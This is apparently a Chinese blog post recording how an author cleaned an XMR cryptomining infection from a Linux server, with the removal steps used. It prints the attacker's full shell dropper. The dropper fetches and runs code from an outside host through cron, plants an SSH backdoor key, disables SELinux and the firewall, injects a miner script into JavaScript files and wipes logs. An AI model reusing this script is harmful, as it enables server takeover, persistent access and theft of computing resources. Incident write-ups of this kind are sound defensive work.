XMR惡意挖礦腳本處理筆記
1、登陸linux
攻擊者如何登陸系統未能查出,全部日誌已被清除。爲防萬一,把系統中沒用的用戶都刪掉並修改其餘用戶密碼。docker
2、被攻擊後的表象shell
一、服務器資源被大量佔用,資源佔用率飆升;數據庫
二、服務器全部JS文件被篡改,向輸出頁面增長了一個script標籤(document.write('<script src="http://t.cn/EvlonFh"></script><script>OMINEId("e02cf4ce91284dab9bc3fc4cc2a65e28","-1")</script>');)瀏覽器
三、網站沒法加載,會出現瀏覽器卡死的狀況bash
3、排查服務器
一、訪問服務器上運行的網站,從瀏覽器控制檯中發現不停訪問一個wss的地址(wss://xmr.omine.org:8181/),而且很慢。網絡
二、經過百度搜索這個地址,可知此爲XMR惡意挖礦腳本。ssh
三、遠程登陸服務器,輸入top命令,發現有zigw進程在運行,消耗大量資源,kill掉之後還會出現。curl
四、查看系統任務計劃,發現按期同步惡意腳本的計劃內容
1 # crontab -l
五、獲取其樣本文件,而後刪除其任務計劃
1 # wget http://c.21-2n.com:43768/shz.sh 2 # crontab -r
六、查看該樣本文件,是一個shell腳本,內容以下:
1 #!/bin/sh 2 3 setenforce 0 2>dev/null 4 5 echo SELINUX=desabled > /etc/sysconfig/selinux 2>/dev/null 6 7 sync && echo 3 >/proc/sys/vm/drop_caches 8 9 crondir='/var/spool/cron/'"$USER" 10 11 cont=`cat ${crondir}` 12 13 ssht=`cat /root/.ssh/authorized_keys` 14 15 echo 1 > /etc/gmbpr2 16 17 rtdir="/etc/gmbpr2" 18 19 oddir="/etc/gmbpr" 20 21 bbdir="/usr/bin/curl" 22 23 bbdira="/usr/bin/url" 24 25 ccdir="/usr/bin/wget" 26 27 ccdira="/usr/bin/get" 28 29 mv /usr/bin/wget /usr/bin/get 30 31 mv /usr/bin/curl /usr/bin/url 32 33 if [ -f "$oddir" ] 34 35 then 36 37 pkill zjgw 38 39 chattr -i /etc/shz.sh 40 41 rm -f /etc/shz.sh 42 43 chattr -i /tmp/shz.sh 44 45 rm -f /tmp/shz.sh 46 47 chattr -i /etc/gmbpr 48 49 rm -f /etc/gmbpr 50 51 else 52 53 echo "ok" 54 55 fi 56 57 if [ -f "$rtdir" ] 58 59 then 60 61 echo "goto 1" >> /etc/gmbpr2 62 63 chattr -i $cont 64 65 if [ -f "$bbdir" ] 66 67 then 68 69 [[ $cont =~ "shz.sh" ]] || echo "*/12 * * * * curl -fsSL http://c.21-2n.com:43768/shz.sh | sh" >> ${crondir} 70 71 else 72 73 [[ $cont =~ "shz.sh" ]] || echo "*/15 * * * * url -fsSL http://c.21-2n.com:43768/shz.sh | sh" >> ${crondir} 74 75 fi 76 77 mkdir /root/.ssh 78 79 [[ $ssht =~ "xvsRtqHLMWoh" ]] || chmod 700 /root/.ssh/ 80 81 [[ $ssht =~ "xvsRtqHLMWoh" ]] || echo >> /root/.ssh/authorized_keys 82 83 [[ $ssht =~ "xvsRtqHLMWoh" ]] || chmod 600 /root/.ssh/authorized_keys 84 85 [[ $ssht =~ "xvsRtqHLMWoh" ]] || echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDFNFCF6tOvSqqN9Zxc/ZkBe2ijEAMhqLEzPe4vprfiPAyGO8CF8tn9dcPQXh9iv5/vYEbaDxEvixkTVSJpWnY/5ckeyYsXU9zEeVbbWkdRcuAs8bdVU7PxVq11HLMxiqSR3MKIj7yEYjclLHRUzgX0mF2/xpZEn4GGL+Kn+7GgxvsRtqHLMWoh2Xoz7f8Rb3KduYiJlZeX02a4qFXHMSkSkMnHirHHtavIFjAB0y952+1DzD36a8IJJcjAGutYjnrZdKP8t3hiEw0UBADhiu3+KU641Kw9BfR9Kg7vZgrVRf7lVzOn6O8YbqgunZImJt+uLljgpP0ZHd1wGz+QSHEd Administrator@Guess_me" >> /root/.ssh/authorized_keys 86 87 ps -fe|grep zigw |grep -v grep 88 89 if [ $? -ne 0 ] 90 91 then 92 93 cd /etc 94 95 filesize=`ls -l zigw | awk '{ print $5 }'` 96 97 file="/etc/zigw" 98 99 if [ -f "$file" ] 100 101 then 102 103 if [ "$filesize" -ne "1467080" ] 104 105 then 106 107 chattr -i /etc/zigw 108 109 rm -f zigw 110 111 if [ -f "$bbdir" ] 112 113 then 114 115 curl --connect-timeout 10 --retry 10 http://c.21-2n.com:43768/zigw > /etc/zigw 116 117 elif [ -f "$bbdira" ] 118 119 then 120 121 url --connect-timeout 10 --retry 10 http://c.21-2n.com:43768/zigw > /etc/zigw 122 123 elif [ -f "$ccdir" ] 124 125 then 126 127 wget --timeout=10 --tries=10 -P /etc http://c.21-2n.com:43768/zigw 128 129 elif [ -f "$ccdira" ] 130 131 then 132 133 get --timeout=10 --tries=10 -P /etc http://c.21-2n.com:43768/zigw 134 135 fi 136 137 fi 138 139 else 140 141 if [ -f "$bbdir" ] 142 143 then 144 145 curl --connect-timeout 10 --retry 10 http://c.21-2n.com:43768/zigw > /etc/zigw 146 147 elif [ -f "$bbdira" ] 148 149 then 150 151 url --connect-timeout 10 --retry 10 http://c.21-2n.com:43768/zigw > /etc/zigw 152 153 elif [ -f "$ccdir" ] 154 155 then 156 157 wget --timeout=10 --tries=10 -P /etc http://c.21-2n.com:43768/zigw 158 159 elif [ -f "$ccdira" ] 160 161 then 162 163 get --timeout=10 --tries=10 -P /etc http://c.21-2n.com:43768/zigw 164 165 fi 166 167 fi 168 169 chmod 777 zigw 170 171 sleep 1s 172 173 ./zigw 174 175 else 176 177 echo "runing....." 178 179 fi 180 181 chmod 777 /etc/zigw 182 183 chattr +i /etc/zigw 184 185 chmod 777 /etc/shz.sh 186 187 chattr +i /etc/shz.sh 188 189 shdir='/etc/shz.sh' 190 191 if [ -f "$shdir" ] 192 193 then 194 195 echo "exists shell" 196 197 else 198 199 if [ -f "$bbdir" ] 200 201 then 202 203 curl --connect-timeout 10 --retry 10 http://c.21-2n.com:43768/shz.sh > /etc/shz.sh 204 205 elif [ -f "$bbdira" ] 206 207 then 208 209 url --connect-timeout 10 --retry 10 http://c.21-2n.com:43768/shz.sh > /etc/shz.sh 210 211 elif [ -f "$ccdir" ] 212 213 then 214 215 wget --timeout=10 --tries=10 -P /etc http://c.21-2n.com:43768/shz.sh 216 217 elif [ -f "$ccdira" ] 218 219 then 220 221 get --timeout=10 --tries=10 -P /etc http://c.21-2n.com:43768/shz.sh 222 223 fi 224 225 sh /etc/shz.sh 226 227 fi 228 229 else 230 231 echo "goto 1" > /tmp/gmbpr2 232 233 chattr -i $cont 234 235 if [ -f "$bbdir" ] 236 237 then 238 239 [[ $cont =~ "shz.sh" ]] || echo "*/10 * * * * curl -fsSL http://c.21-2n.com:43768:43768/shz.sh | sh" >> ${crondir} 240 241 else 242 243 [[ $cont =~ "shz.sh" ]] || echo "*/10 * * * * url -fsSL http://c.21-2n.com:43768:43768/shz.sh | sh" >> ${crondir} 244 245 fi 246 247 ps -fe|grep zigw |grep -v grep 248 249 if [ $? -ne 0 ] 250 251 then 252 253 cd /tmp 254 255 filesize=`ls -l zigw | awk '{ print $5 }'` 256 257 file="/tmp/zigw" 258 259 if [ -f "$file" ] 260 261 then 262 263 if [ "$filesize" -ne "1467080" ] 264 265 then 266 267 chattr -i /tmp/zigw 268 269 rm -f zigw 270 271 if [ -f "$bbdir" ] 272 273 then 274 275 curl --connect-timeout 10 --retry 10 http://c.21-2n.com:43768/zigw > /tmp/zigw 276 277 elif [ -f "$bbdira" ] 278 279 then 280 281 url --connect-timeout 10 --retry 10 http://c.21-2n.com:43768/zigw > /tmp/zigw 282 283 elif [ -f "$ccdir" ] 284 285 then 286 287 wget --timeout=10 --tries=10 -P /tmp http://c.21-2n.com:43768/zigw 288 289 elif [ -f "$ccdira" ] 290 291 then 292 293 get --timeout=10 --tries=10 -P /tmp http://c.21-2n.com:43768/zigw 294 295 fi 296 297 fi 298 299 else 300 301 if [ -f "$bbdir" ] 302 303 then 304 305 curl --connect-timeout 10 --retry 10 http://c.21-2n.com:43768/zigw > /tmp/zigw 306 307 elif [ -f "$bbdira" ] 308 309 then 310 311 url --connect-timeout 10 --retry 10 http://c.21-2n.com:43768/zigw > /tmp/zigw 312 313 elif [ -f "$ccdir" ] 314 315 then 316 317 wget --timeout=10 --tries=10 -P /tmp http://c.21-2n.com:43768/zigw 318 319 elif [ -f "$ccdira" ] 320 321 then 322 323 get --timeout=10 --tries=10 -P /tmp http://c.21-2n.com:43768/zigw 324 325 fi 326 327 fi 328 329 chmod 777 zigw 330 331 sleep 1s 332 333 ./zigw 334 335 else 336 337 echo "runing....." 338 339 fi 340 341 chmod 777 /tmp/zigw 342 343 chattr +i /tmp/zigw 344 345 chmod 777 /tmp/shz.sh 346 347 chattr +i /tmp/shz.sh 348 349 shdir='/tmp/shz.sh' 350 351 if [ -f "$shdir" ] 352 353 then 354 355 echo "exists shell" 356 357 else 358 359 if [ -f "$bbdir" ] 360 361 then 362 363 curl --connect-timeout 10 --retry 10 http://c.21-2n.com:43768/shz.sh > /tmp/shz.sh 364 365 elif [ -f "$bbdira" ] 366 367 then 368 369 url --connect-timeout 10 --retry 10 http://c.21-2n.com:43768/shz.sh > /tmp/shz.sh 370 371 elif [ -f "$ccdir" ] 372 373 then 374 375 wget --timeout=10 --tries=10 -P /tmp http://c.21-2n.com:43768/shz.sh 376 377 elif [ -f "$ccdira" ] 378 379 then 380 381 get --timeout=10 --tries=10 -P /tmp http://c.21-2n.com:43768/shz.sh 382 383 fi 384 385 sh /tmp/shz.sh 386 387 fi 388 389 fi 390 391 iptables -F 392 393 iptables -X 394 395 iptables -A OUTPUT -p tcp --dport 3333 -j DROP 396 397 iptables -A OUTPUT -p tcp --dport 5555 -j DROP 398 399 iptables -A OUTPUT -p tcp --dport 7777 -j DROP 400 401 iptables -A OUTPUT -p tcp --dport 9999 -j DROP 402 403 iptables -A OUTPUT -p tcp --dport 14444 -j DROP 404 405 iptables-save 406 407 service iptables reload 408 409 ps auxf|grep -v grep|grep "stratum"|awk '{print $2}'|xargs kill -9 410 411 netstat -ano|grep :3333|awk '{print $7}'|awk -F'[/]' '{print $1}'|xargs kill -9 412 413 netstat -ano|grep :4444|awk '{print $7}'|awk -F'[/]' '{print $1}'|xargs kill -9 414 415 netstat -ano|grep :5555|awk '{print $7}'|awk -F'[/]' '{print $1}'|xargs kill -9 416 417 netstat -ano|grep :6666|awk '{print $7}'|awk -F'[/]' '{print $1}'|xargs kill -9 418 419 netstat -ano|grep :7777|awk '{print $7}'|awk -F'[/]' '{print $1}'|xargs kill -9 420 421 netstat -ano|grep :3347|awk '{print $7}'|awk -F'[/]' '{print $1}'|xargs kill -9 422 423 netstat -ano|grep :14444|awk '{print $7}'|awk -F'[/]' '{print $1}'|xargs kill -9 424 425 netstat -ano|grep :14443|awk '{print $7}'|awk -F'[/]' '{print $1}'|xargs kill -9 426 427 find / -name '*.js'|xargs grep -L f4ce9|xargs sed -i '$a\document.write\('\'\<script\ src=\"http://t.cn/EvlonFh\"\>\</script\>\<script\>OMINEId\(\"e02cf4ce91284dab9bc3fc4cc2a65e28\",\"-1\"\)\</script\>\'\)\; 428 429 history -c 430 431 echo > /var/spool/mail/root 432 433 echo > /var/log/wtmp 434 435 echo > /var/log/secure 436 437 echo > /root/.bash_history 438 439 echo > /var/spool/mail/root
七、閱讀腳本內容,發現可能會在/etc或/tmp下建立shz.sh和zigw文件,並設置了特殊權限,這次發現是在/etc中;同時會建立ssh免密登陸的密鑰。殺掉進程、修改權限並刪除該文件。
1 # rm -rf ~/.ssh 2 # 3 # ps -aux | grep zigw 4 # kill -9 <進程號> 5 # ps -aux | grep shz 6 # kill -9 <進程號> 7 # 8 # chattr -i /etc/shz.sh /etc/zigw 9 # rm -f /etc/shz.sh /etc/zigw /etc/gmbpr2
八、查看任務計劃的配置文件,並刪除相應內容
1 # ls -alh /etc/cron.d/ 2 # rm -f /etc/cron.d/root
九、恢復服務器中的js文件(其中grep的參數爲小寫的L)
1 # find / -name '*.js' | xargs grep -l f4ce9 | xargs sed -i '/f4ce9/d'
十、所以惡意腳本中刪除了全部防火牆規則,影響到docker容器的網絡功能,即容器中沒法訪問網絡,致使其中運行的網站沒法訪問數據庫,通過查閱資料和研究,認爲須要重建docker網絡,但累了一天,懶得弄了,正好系統更新中包含了docker,更新後恢復正常,得出結論:比較簡單的解決方法就是更新或重裝(好像重建docker網絡也不難)。
比較有疑問的是,看了腳本中是用iptables操做的,但個人服務器中採用的是firewall,沒想明白爲什麼會產生影響。
相關文章
- 1. XMR惡意挖礦病毒清除
- 2. Kworkerd惡意挖礦分析
- 3. 門羅幣(xmr,XMR)挖礦教程
- 4. 門羅幣(xmr,XMR)挖礦教程
- 5. Web應急:門羅幣惡意挖礦
- 6. 集羣挖礦腳本排查日記
- 7. 清除挖礦腳本 minerd
- 8. 門羅幣(XMR)挖礦教程
- 9. CentOS7安裝xmr-stak挖礦門羅幣
- 10. 門羅XMR挖礦安裝教程
- 更多相關文章...
- • Swift 下標腳本 - Swift 教程
- • 錯誤處理 - RUST 教程
- • Tomcat學習筆記(史上最全tomcat學習筆記)
- • Docker 清理命令
相關標籤/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
最新文章
- 1. vs2019運行opencv圖片顯示代碼時,窗口亂碼
- 2. app自動化 - 元素定位不到?別慌,看完你就能解決
- 3. 在Win8下用cisco ××× Client連接時報Reason 422錯誤的解決方法
- 4. eclipse快速補全代碼
- 5. Eclipse中Java/Html/Css/Jsp/JavaScript等代碼的格式化
- 6. idea+spring boot +mabitys(wanglezapin)+mysql (1)
- 7. 勒索病毒發生變種 新文件名將帶有「.UIWIX」後綴
- 8. 【原創】Python 源文件編碼解讀
- 9. iOS9企業部署分發問題深入瞭解與解決
- 10. 安裝pytorch報錯CondaHTTPError:******
歡迎關注本站公眾號,獲取更多信息
相關文章
- 1. XMR惡意挖礦病毒清除
- 2. Kworkerd惡意挖礦分析
- 3. 門羅幣(xmr,XMR)挖礦教程
- 4. 門羅幣(xmr,XMR)挖礦教程
- 5. Web應急:門羅幣惡意挖礦
- 6. 集羣挖礦腳本排查日記
- 7. 清除挖礦腳本 minerd
- 8. 門羅幣(XMR)挖礦教程
- 9. CentOS7安裝xmr-stak挖礦門羅幣
- 10. 門羅XMR挖礦安裝教程